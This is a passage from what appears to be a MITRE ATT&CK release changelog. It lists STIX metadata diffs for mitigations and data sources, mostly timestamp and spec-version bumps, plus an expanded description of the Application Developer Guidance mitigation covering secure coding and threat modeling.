| | | ing application design. - Use Case: Before launching a custo |
| | | mer portal, a SaaS company identifies potential abuse cases, |
| | | such as session hijacking, and designs mitigations like sec |
| | | ure session management. **Tools for Implementation**: - St |
| | | atic Code Analysis Tools: Use tools that can scan for known |
| | | vulnerabilities in source code. - Dynamic Application Securi |
| | | ty Testing (DAST): Use tools like Burp Suite or OWASP ZAP to |
| | | simulate runtime attacks and identify vulnerabilities. - Se |
| | | cure Frameworks: Recommend secure-by-default frameworks (e.g |
| | | ., Django for Python, Spring Security for Java) that enforce |
| | | security best practices. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-27 20:18:19.004000+00:00 | 2024-12-10 16:07:50.023000+00:00 |
| description | This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of. | Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
Preventing SQL Injection (Secure Coding Practice):
- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.
Cross-Site Scripting (XSS) Mitigation:
- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.
Secure API Design:
- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.
Static Code Analysis in the Build Pipeline:
- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.
Threat Modeling in the Design Phase:
- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.
**Tools for Implementation**:
- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices. |
| x_mitre_version | 1.1 | 1.2 |
Patches
[M1058] Antivirus/Antimalware
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-21 19:36:08.280000+00:00 | 2025-04-16 21:22:18.330000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M1002] Attestation
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-18 14:52:53.019000+00:00 | 2025-04-16 21:22:19.448000+00:00 |
[M1010] Deploy Compromised Device Detection Method
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:19.136000+00:00 |
[M1009] Encrypt Network Traffic
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.668000+00:00 |
[M1012] Enterprise Policy
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 15:08:18.395000+00:00 | 2025-04-16 21:22:18.032000+00:00 |
[M1014] Interconnection Filtering
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-15 15:06:03.428000+00:00 | 2025-04-16 21:22:19.290000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M1003] Lock Bootloader
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.821000+00:00 |
[M1001] Security Updates
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-18 14:56:15.631000+00:00 | 2025-04-16 21:22:18.982000+00:00 |
[M1004] System Partition Integrity
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.484000+00:00 |
[M1006] Use Recent OS Version
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:17.864000+00:00 |
[M1011] User Guidance
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-10-18 15:51:48.318000+00:00 | 2025-04-16 21:22:18.181000+00:00 |
ics-attack
Patches
[M0801] Access Management
Current version: 1.0
|
|
|---|
| t | Access Management technologies can be used to enforce author | t | Access Management technologies can be used to enforce author |
| ization polices and decisions, especially when existing fiel | | ization polices and decisions, especially when existing fiel |
| d devices do not provided sufficient capabilities to support | | d devices do not provide sufficient capabilities to support |
| user identification and authentication. (Citation: McCarthy | | user identification and authentication. (Citation: McCarthy, |
| , J et al. July 2018) These technologies typically utilize a | | J et al. July 2018) These technologies typically utilize an |
| n in-line network device or gateway system to prevent access | | in-line network device or gateway system to prevent access |
| to unauthenticated users, while also integrating with an au | | to unauthenticated users, while also integrating with an aut |
| thentication service to first verify user credentials. (Cita | | hentication service to first verify user credentials. (Citat |
| tion: Centre for the Protection of National Infrastructure N | | ion: Centre for the Protection of National Infrastructure No |
| ovember 2010) | | vember 2010) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:30:56.250000+00:00 | 2025-03-12 16:11:54.933000+00:00 |
| description | Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010) | Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provide sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0936] Account Use Policies
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:31:48.809000+00:00 | 2025-04-16 21:26:29.323000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0915] Active Directory Configuration
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:26.911000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0949] Antivirus/Antimalware
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:32:18.375000+00:00 | 2025-04-16 21:26:34.009000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0913] Application Developer Guidance
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:32:48.390000+00:00 | 2025-04-16 21:26:29.489000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0948] Application Isolation and Sandboxing
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:33:26.200000+00:00 | 2025-04-16 21:26:25.920000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0947] Audit
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:34:08.571000+00:00 | 2025-04-16 21:26:31.848000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0946] Boot Integrity
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:38:22.681000+00:00 | 2025-04-16 21:26:29.725000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0945] Code Signing
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:39:41.056000+00:00 | 2025-04-16 21:26:28.975000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0802] Communication Authenticity
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:40:49.135000+00:00 | 2025-04-16 21:26:32.013000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0953] Data Backup
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:41:39.667000+00:00 | 2025-04-16 21:26:31.496000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0803] Data Loss Prevention
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 20:55:14.442000+00:00 | 2025-04-16 21:26:27.444000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0942] Disable or Remove Feature or Program
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:42:11.231000+00:00 | 2025-04-16 21:26:32.177000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0808] Encrypt Network Traffic
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:42:52.198000+00:00 | 2025-04-16 21:26:29.147000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0941] Encrypt Sensitive Information
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:43:17.085000+00:00 | 2025-04-16 21:26:31.005000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0938] Execution Prevention
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:43:44.551000+00:00 | 2025-04-16 21:26:28.155000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0950] Exploit Protection
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:44:04.416000+00:00 | 2025-04-16 21:26:27.827000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0937] Filter Network Traffic
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:44:59.425000+00:00 | 2025-04-16 21:26:26.074000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0935] Limit Access to Resource Over Network
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:48:00.950000+00:00 | 2025-04-16 21:26:27.991000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0934] Limit Hardware Installation
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:48:22.980000+00:00 | 2025-04-16 21:26:30.822000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0805] Mechanical Protection Layers
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:29.910000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0806] Minimize Wireless Signal Propagation
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:48:44.925000+00:00 | 2025-04-16 21:26:34.172000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0816] Mitigation Limited or Not Effective
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:27.652000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0932] Multi-factor Authentication
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:49:12.466000+00:00 | 2025-04-16 21:26:32.907000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0807] Network Allowlists
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:49:34.958000+00:00 | 2025-04-16 21:26:31.149000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0931] Network Intrusion Prevention
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:49:53.366000+00:00 | 2025-04-16 21:26:27.092000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0930] Network Segmentation
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:50:12.354000+00:00 | 2025-04-16 21:26:26.551000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0928] Operating System Configuration
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:50:30.709000+00:00 | 2025-04-16 21:26:30.648000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0809] Operational Information Confidentiality
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 20:55:15.415000+00:00 | 2025-04-16 21:26:30.453000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0810] Out-of-Band Communications Channel
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:50:55.129000+00:00 | 2025-04-16 21:26:31.696000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0927] Password Policies
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:51:14.526000+00:00 | 2025-04-16 21:26:28.470000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0926] Privileged Account Management
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:51:40.366000+00:00 | 2025-04-16 21:26:28.652000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0811] Redundancy of Service
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:52:11.728000+00:00 | 2025-04-16 21:26:33.475000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0922] Restrict File and Directory Permissions
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:10:12.604000+00:00 | 2025-04-16 21:26:33.651000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0944] Restrict Library Loading
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:10:52.949000+00:00 | 2025-04-16 21:26:26.729000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0924] Restrict Registry Permissions
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:11:12.773000+00:00 | 2025-04-16 21:26:27.274000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0921] Restrict Web-Based Content
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:11:35.668000+00:00 | 2025-04-16 21:26:26.226000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0920] SSL/TLS Inspection
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:28.819000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0812] Safety Instrumented Systems
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:32.513000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0954] Software Configuration
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:12:04.727000+00:00 | 2025-04-16 21:26:33.833000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0814] Static Network Configuration
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:12:51.139000+00:00 | 2025-04-16 21:26:28.312000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0817] Supply Chain Management
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:13:12.169000+00:00 | 2025-04-16 21:26:31.301000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0919] Threat Intelligence Program
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:32.342000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0951] Update Software
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:13:41.305000+00:00 | 2025-04-16 21:26:30.090000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0918] User Account Management
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:14:10.061000+00:00 | 2025-04-16 21:26:33.298000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0917] User Training
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:14:30.311000+00:00 | 2025-04-16 21:26:32.717000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0818] Validate Program Inputs
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:14:57.819000+00:00 | 2025-04-16 21:26:26.390000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0916] Vulnerability Scanning
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 13:15:23.350000+00:00 | 2025-04-16 21:26:33.110000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0815] Watchdog Timers
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 20:55:16.383000+00:00 | 2025-04-16 21:26:30.248000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Data Sources
enterprise-attack
Minor Version Changes
[DS0015] Application Log
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.207Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0022] File
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-07T19:35:34.863Z | 2025-04-18T15:10:04.845Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0018] Firewall
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:12.372Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[DS0028] Logon Session
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:12:19.778Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0003] Scheduled Job
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:11:33.637Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0012] Script
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-07T19:50:56.964Z | 2025-04-18T15:12:42.967Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0019] Service
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.807Z | 2025-04-18T15:10:47.833Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0002] User Account
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:09:38.667Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
Patches
[DS0026] Active Directory
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:09.450Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0037] Certificate
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:10.496Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0025] Cloud Service
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| revoked | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2024-11-17T19:41:14.066Z |
| external_references[2]['description'] | Microsoft. (n.d.). Azure products. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure products. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://azure.microsoft.com/en-us/services/ | https://azure.microsoft.com/en-us/products/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0010] Cloud Storage
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| revoked | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.694Z | 2024-11-17T19:42:50.489Z |
| external_references[2]['description'] | Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure Blob Storage. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://azure.microsoft.com/en-us/services/storage/blobs/ | https://azure.microsoft.com/en-us/products/storage/blobs/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0032] Container
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| revoked | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.694Z | 2024-12-24T18:06:47.351Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0038] Domain Name
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:11.900Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0016] Drive
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.804Z | 2025-04-18T15:12:29.888Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0027] Driver
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.805Z | 2025-04-16T20:39:09.930Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0001] Firmware
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:12:49.401Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0036] Group
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.972Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0007] Image
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.696Z | 2025-04-16T20:39:11.122Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0030] Instance
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| revoked | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2024-11-17T19:40:29.066Z |
| external_references[1]['description'] | Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021. | Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/ | https://azure.microsoft.com/en-us/resources/cloud-computing-dictionary/what-is-a-virtual-machine/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0035] Internet Scan
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:08.675Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0008] Kernel
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
